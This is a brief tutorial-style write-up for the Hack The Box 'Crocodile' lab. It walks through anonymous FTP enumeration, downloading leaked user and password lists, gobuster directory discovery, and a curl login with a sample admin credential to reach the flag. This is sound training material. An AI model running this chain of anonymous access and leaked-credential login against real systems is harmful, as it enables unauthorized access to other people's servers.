HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag

Introduction

In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.

You’ll learn to:

• Enumerate FTP and download leaked credential files
• Extract valid usernames/passwords
• Use Gobuster to discover hidden web pages
• Authenticate to a PHP login panel and capture the flag

Prerequisites

• Kali Linux (or any distro with ftp, gobuster, curl)
• HTB VPN connection

1. FTP Enumeration

nmap -sC -sV -p 21,80 
ftp 
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd

Inspect the lists:

cat allowed.userlist
cat allowed.userlist.passwd

2. Extract Credentials

From allowed.userlist + .passwd, find a valid pair (e.g. admin / Supersecretpassword1).

3. Discover Hidden Pages

gobuster dir \
  --url http:/// \
  --wordlist /usr/share/wordlists/dirb/common.txt \
  -x php,html

Look for /login.php.

4. Admin Login & Flag

curl -d "username=admin&password=Supersecretpassword1" \
     http:///login.php

You’ll be redirected to the Admin panel—your flag is displayed at the top.

5. Lessons Learned

• Anonymous services often leak credentials.
• Combine leaked creds with web enumeration for full-chain exploits.
• Automate with scripts in professional engagements.

🔗 Repo & full write‑up: https://github.com/keyfive5/obsidiansignal-htb-crocodile